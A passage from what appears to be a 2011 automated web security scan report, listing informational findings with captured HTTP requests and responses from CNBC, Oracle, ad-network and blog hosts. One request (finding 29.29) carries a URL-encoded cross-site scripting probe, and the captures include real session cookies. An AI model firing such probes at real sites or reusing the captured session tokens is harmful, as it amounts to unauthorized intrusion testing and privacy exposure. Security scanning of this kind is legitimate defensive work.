Path:	/company/quote/incchart.asp

Request

GET /company/quote/incchart.asp?symbol=.DJIA HTTP/1.1
Host: apps.cnbc.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; s_cc=true; __qseg=Q_D; cnbc_regional_cookie=US; s_nr=1315339529299; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520window.location%25253D%252527http%25253A//data.cnbc.com/quotes/.DJIA%252527%25257D%2526oidt%253D2%2526ot%253DA; cnbcStreamQuoteMasterToggleRememberSwitch=on; cnbc_most_recent_quotes=.DJIA

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 15:05:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:25:34 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 1250

<html>
<head>
   <title>Quote Page -- Tabbed Chart</title>
   <link rel="stylesheet" href="../resources/style/incChart.css" type="text/css" />
</head>
<body>
   <div id="overviewChart">
       <di
...[SNIP]...

29.16. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.harbottle.com
Path:	/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php

Request

GET /dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php HTTP/1.1
Host: blog.harbottle.com
Proxy-Connection: keep-alive
Referer: http://blog.harbottle.com/dm/?p=20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; PHPSESSID=b6055d312cfe49b165dbf84a4f9f142b; __utma=40427633.423165929.1315345403.1315345403.1315345403.1; __utmc=40427633; __utmz=40427633.1315345403.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=40427633

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:10 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Pragma: no-cache
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 3391
Connection: close
Content-Type: text/html

function nVDxyoUNoxWe(){var aDnRlLWkZIxuL = new Array(69); aDnRlLWkZIxuL[0] = 259292677 ^ 1813646179; aDnRlLWkZIxuL[1] = 41247255 ^ 1813646179; aDnRlLWkZIxuL[2] = 91836227 ^ 1813646179; aDnRlLWkZIxuL[
...[SNIP]...

29.17. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.harbottle.com
Path:	/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php

Request

GET /dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php HTTP/1.1
Host: blog.harbottle.com
Proxy-Connection: keep-alive
Referer: http://blog.harbottle.com/dm/?p=20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; PHPSESSID=b6055d312cfe49b165dbf84a4f9f142b; __utma=40427633.423165929.1315345403.1315345403.1315345403.1; __utmc=40427633; __utmz=40427633.1315345403.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=40427633

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Vary: Accept-Encoding
Content-Length: 1875
Connection: close
Content-Type: text/html

addLoadEvent(lhKlhkMavT);

function createHiddenField(){
   var inp = document.createElement('input');
   inp.setAttribute('type', 'hidden');
   inp.setAttribute('id', 'HRXlXDPwKvYVGwGt');
   inp.setA
...[SNIP]...

29.18. http://blog.harbottle.com/dm/xmlrpc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.harbottle.com
Path:	/dm/xmlrpc.php

Request

GET /dm/xmlrpc.php HTTP/1.1
Host: blog.harbottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

29.19. http://blogs.oracle.com/main/resource/resources/ora_code_blogs.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.oracle.com
Path:	/main/resource/resources/ora_code_blogs.js

Request

GET /main/resource/resources/ora_code_blogs.js HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 06 Sep 2011 15:09:16 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=14;ecid=51387194612877553,0:1)
Content-Length: 36547
Vary: Accept-Encoding
Expires: Tue, 06 Sep 2011 16:12:52 GMT
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

var oraVersion="ora_code_blogs:1.03:H22.1";function s_setAccount(){var sa=["oracledevall","ocom","en-us"];
if(location.href.indexOf("-stage")!=-1||location.href.indexOf("-dev")!=-1||location.href.ind
...[SNIP]...

29.20. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.oracle.com
Path:	/otn/resource/1OTN-2col/OTNHead-Short.png

Request

Response

29.21. http://blogs.oracle.com/otn/resource/SunOracle.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.oracle.com
Path:	/otn/resource/SunOracle.png

Request

GET /otn/resource/SunOracle.png HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/resource/html/aboutMe6.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 20:20:39 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
X-Oracle-DMS-ECID: 4984942665267212
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=3600+360;age=0;ecid=4984942665267212,0:1)
Vary: Accept-Encoding
Content-Length: 7183
Expires: Tue, 06 Sep 2011 16:12:52 GMT
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

.PNG
.
...IHDR...d...D.....wN.b....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&......*.E......z.d/J.ZE(..(b..-..nL.....~..7.}ov..r.4.....R..il|Bj..... A4%U..N$.A.s.{..z..[V.{
...[SNIP]...

29.22. http://blogs.oracle.com/otn/resource/java-logo.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.oracle.com
Path:	/otn/resource/java-logo.png

Request

GET /otn/resource/java-logo.png HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/resource/html/aboutMe6.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 20:20:39 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
X-Oracle-DMS-ECID: 4444103192084779
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=3600+360;age=0;ecid=4444103192084779,0:1)
Vary: Accept-Encoding
Content-Length: 9353
Expires: Tue, 06 Sep 2011 16:12:52 GMT
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

.PNG
.
...IHDR...K...y.....q..L....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&......*.E......z.d/J.ZE(..(b..-..nL.....~..7.}ov..r.4.....R..il|Bj..... A4%U..N$.A.s.{..z..[V.{
...[SNIP]...

29.23. http://blogs.oracle.com/theme/scripts/clientSideInclude.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.oracle.com
Path:	/theme/scripts/clientSideInclude.js

Request

GET /theme/scripts/clientSideInclude.js HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/entry/we_wish_jim_grays_accomplishme
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343700623; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Ftags%2Fdatabase%3Fpage%3D1; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Ftags%25252Fdatabase%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Fotn%25252Fentry%25252Fwe_wish_jim_grays_accomplishme%2526ot%253DA

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Last-Modified: Tue, 26 Apr 2011 19:28:04 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=248;ecid=51681369811325973,0:1)
Content-Length: 2209
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:15:01 GMT
Connection: close

/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. The ASF licenses this file to You
* under the Apache License, Version 2.0 (the "License"); y
...[SNIP]...

29.24. http://blogs.oracle.com/theme/scripts/roller.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.oracle.com
Path:	/theme/scripts/roller.js

Request

GET /theme/scripts/roller.js HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/entry/we_wish_jim_grays_accomplishme
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343700623; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Ftags%2Fdatabase%3Fpage%3D1; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Ftags%25252Fdatabase%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Fotn%25252Fentry%25252Fwe_wish_jim_grays_accomplishme%2526ot%253DA

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Last-Modified: Tue, 26 Apr 2011 19:28:04 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=82;ecid=51681356926423946,0:1)
Content-Length: 6164
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:15:01 GMT
Connection: close

/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. The ASF licenses this file to You
* under the Apache License, Version 2.0 (the "License"); y
...[SNIP]...

29.25. http://c.brightcove.com/services/messagebroker/amf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.brightcove.com
Path:	/services/messagebroker/amf

Request

GET /services/messagebroker/amf HTTP/1.1
Host: c.brightcove.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Tue, 06 Sep 2011 17:06:20 GMT
Server:
Content-Length: 27076

<html>
<head>
<title>gobbles!</title>
</head>
<body>
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This tu
...[SNIP]...

29.26. http://cdn.krxd.net/kruxcontent/krux_iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.krxd.net
Path:	/kruxcontent/krux_iframe.html

Request

GET /kruxcontent/krux_iframe.html?bumpCookie HTTP/1.1
Host: cdn.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b009

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Expires: Tue, 06 Sep 2011 16:04:20 GMT
Server: Apache
X-N: S
Last-Modified: Thu, 25 Aug 2011 01:21:21 GMT
Accept-Ranges: bytes
Content-Type: text/html
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
X-Request-Time: D=906 t=1314641218918495
X-Served-By: logger-b011.krxd.net
Content-Length: 2023
Date: Tue, 06 Sep 2011 15:59:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html>
<html>
<body>

<script>
// cookie lib, minified
cookie=function(name,value,options){if(arguments.length>1){options=options||{};if(!(value)){v
...[SNIP]...

29.27. http://cdn5.tribalfusion.com/media/1956006/frame.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/media/1956006/frame.html

Request

Response

29.28. http://cdn5.tribalfusion.com/media/2516896//frm.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/media/2516896//frm.html

Request

Response

29.29. http://ds.addthis.com/red/psi/sites/www.dove.us/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.dove.us/p.json

Request

GET /red/psi/sites/www.dove.us/p.json?callback=_ate.ad.hpr&uid=4e37104432fe1148&url=http%3A%2F%2Fwww.dove.us%2FProducts%2FHair%2F%3F%22)%3C%2Fscript%3Ed91bc007f7%3D1&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&ynnuuq HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
Cookie: uid=4e37104432fe1148; psc=4; di=%7B%222%22%3A%222040695539456590%2CMhd7ak45SYsADCcs%22%7D..1315247533.10R|1315247533.1WV|1315247533.1FE|1315247533.1OD|1315247533.60|1315247533.1EY; uvc=2|32,6|33,6|34,15|35,12|36; dt=X; loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 06 Sep 2011 16:53:42 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 06 Oct 2011 16:53:42 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 06 Sep 2011 16:53:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 16:53:42 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

29.30. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Request

Response

29.31. http://install.volusion.com/installer/demos/Empty.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://install.volusion.com
Path:	/installer/demos/Empty.htm

Request

GET /installer/demos/Empty.htm HTTP/1.1
Host: install.volusion.com
Proxy-Connection: keep-alive
Referer: http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WRUID=0; __utma=1.869666244.1315341244.1315341244.1315341244.1; __utmb=1.2.10.1315341244; __utmc=1; __utmz=1.1315341244.1.1.utmgclid=CKPJnbn4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:702-MYH-396&token:_mch-volusion.com-1315341246586-52878; __kti=1315341246706,http%3A%2F%2Fwww.volusion.com%2F%3F_kk%3D%252Becommerce%2520%252Bsolution%26_kt%3D3fda914a-c56d-407d-b8c6-0b1636cef4d3%26gclid%3DCKPJnbn4iKsCFSE8gwod-iiK3g,http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio; __kts=1315341246707,http%3A%2F%2Fwww.volusion.com%2F%3F_kk%3D%252Becommerce%2520%252Bsolution%26_kt%3D3fda914a-c56d-407d-b8c6-0b1636cef4d3%26gclid%3DCKPJnbn4iKsCFSE8gwod-iiK3g,http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio; __ktv=e7bf-9861-7a47-e7571324072a0f4; __ktt=3f9f-b66-9534-ae121324072a0f5; TRIALSTEP=/free-trial/form-1

Response

HTTP/1.1 200 OK
Content-Length: 40
Content-Type: text/html
Last-Modified: Mon, 18 Jul 2011 21:43:00 GMT
Accept-Ranges: bytes
ETag: "e0b77aaa9345cc1:56fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:34:39 GMT

...<body bgcolor="#ffffff"> </body>

29.32. http://js.adsonar.com/js/pass.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.adsonar.com
Path:	/js/pass.html

Request

GET /js/pass.html?cb=34121 HTTP/1.1
Host: js.adsonar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.tacoda.at.atwola.com/an/qseg.html

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 24 Jun 2011 15:16:10 GMT
ETag: "5ab-4a676ae738280"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 1451
Content-Type: text/html
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 15:30:15 GMT
Date: Tue, 06 Sep 2011 15:00:15 GMT
Connection: close

<html><body><script type="text/javascript">
window.onerror=errorHandle;function errorHandle(e){return true;}var d=location.hash;if(d){var c=document.cookie;if(c.length==0||(c.length>0&&c.indexOf("oo_
...[SNIP]...

29.33. https://login.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/

Request

GET / HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

29.34. http://m.cnbc.com/mytest/ipecho.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.cnbc.com
Path:	/mytest/ipecho.php

Request

GET /mytest/ipecho.php HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Cache-Control: max-age=1
Expires: Tue, 06 Sep 2011 14:57:01 GMT
Vary: Accept-Encoding
Content-Type: text/html
Via: 1.1 aicache6
Content-Length: 59
X-Aicache-OS: 64.210.193.252:80
Connection: Keep-Alive
Keep-Alive: max=20

getip({"ip": "64.210.193.254", "address":"50.23.123.106"});

29.35. https://myprofile.oracle.com/EndUser/images/fading-background.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/images/fading-background.png

Request

Response

29.36. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/images/logo-oracle-red.png

Request

Response

29.37. https://myprofile.oracle.com/EndUser/jscripts/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_code.js

Request

Response

29.38. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_code_popup.js

Request

Response

29.39. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_code_profile.js

Request

Response

29.40. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_validation.js

Request

Response

29.41. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=2429&ref2=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio&tzo=360&ms=530 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=F788D26BA3284C76A75E75F5D13F522A; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 06 Sep 2011 15:32:10 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

29.42. http://optimized-by.rubiconproject.com/a/dk.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.html

Request

GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
